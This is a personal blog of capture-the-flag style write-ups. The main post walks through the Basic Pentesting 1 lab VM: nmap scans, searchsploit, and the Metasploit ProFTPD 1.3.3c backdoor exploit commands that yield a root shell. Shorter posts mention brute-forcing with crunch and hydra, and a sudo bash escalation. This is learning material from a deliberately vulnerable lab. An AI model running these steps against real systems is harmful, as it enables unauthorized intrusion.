Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things turned up the following VM which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, looks like it’s hostname is vtcsec (made a note of that…)  Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format, (I run URXVT, so it’s likely some unicode that won’t translate to ASCII neatly… whatever). I did find two options availabl, the one that interests me was “Backdoor Command Execution (metasploit). So let’s fire up metasploit and see what we can do.

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c backdoor! This should be easy enough then.

use exploit/unix/ftp/pro_ftpd_133c
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.

 

If you want to see some other vulnerable VM write-ups I’ve done check out the vulnerable VM category.

Learning Feels Like Cheating

So on a couple of the vulnerable machines I’ve reached a point where I have no idea what to do next.  I’ve ended up pulling the walkthroughs and seeing how other people approach things.  While it makes sense to learn from others, and it absolutely has helped me learn multiple techniques way faster than I could have on my own, I can’t shake the feeling it’s cheating.  I suppose it’s my own bullshit. But if the goal is to learn how to do something, and I can accomplish that goal, and gain the useful knowledge in a fraction of the time (and still retain that information for later) it just makes sense.  I do hope to do enough of these that I can start getting root without cheat sheets. But for now, it’s still very much a learning experience for me, so I’ll keep on looking things up as needed.

All of that said, I’m already seeing a big difference. I know far more tools than I did a month ago. I can accomplish a good deal from memory/experience at this point.  I’m learning things. So if that’s the goal, then cheating be damned, I’m going to do it.

RickdiculouslyEasy

Luke (@LhHillz) put together a B2R called RickdiculouslyEasy.  How could I resist. Wubbalubbadubdub here we go! Will post updates as things progress.

UPDATE: Completed. Got all 130 points, took 2 1/2 hours.  Learned tons of things. Even some things I probably should have already know from being a syadmin. (how to use SCP from command line!)

Learned about building password lists using crunch, and then using those lists to attack something with hydra.  All in all, time well spent. Onto the next one!

LazySysadmin Done

Finished badstore, so it was time for something new.

So I downloaded and spun up LazySysAdmin.  A friend concurrently tried the same and showed me a couple of things. (SPARTA!!!) I learned about wpscan from some googling which turned up some nice info. Found an open share which had a password hidden in it.  Located the WordPress config file and got myself into a basic shell with the info I found there, then once in was able to get a root shell by launching BASH from sudo.  It’s listed as an easy Boot2Root, and it was fairly straightforward. Lots of fun though. Thanks to Togie McDogie (@TogieMcdogie)!

Onto the next one…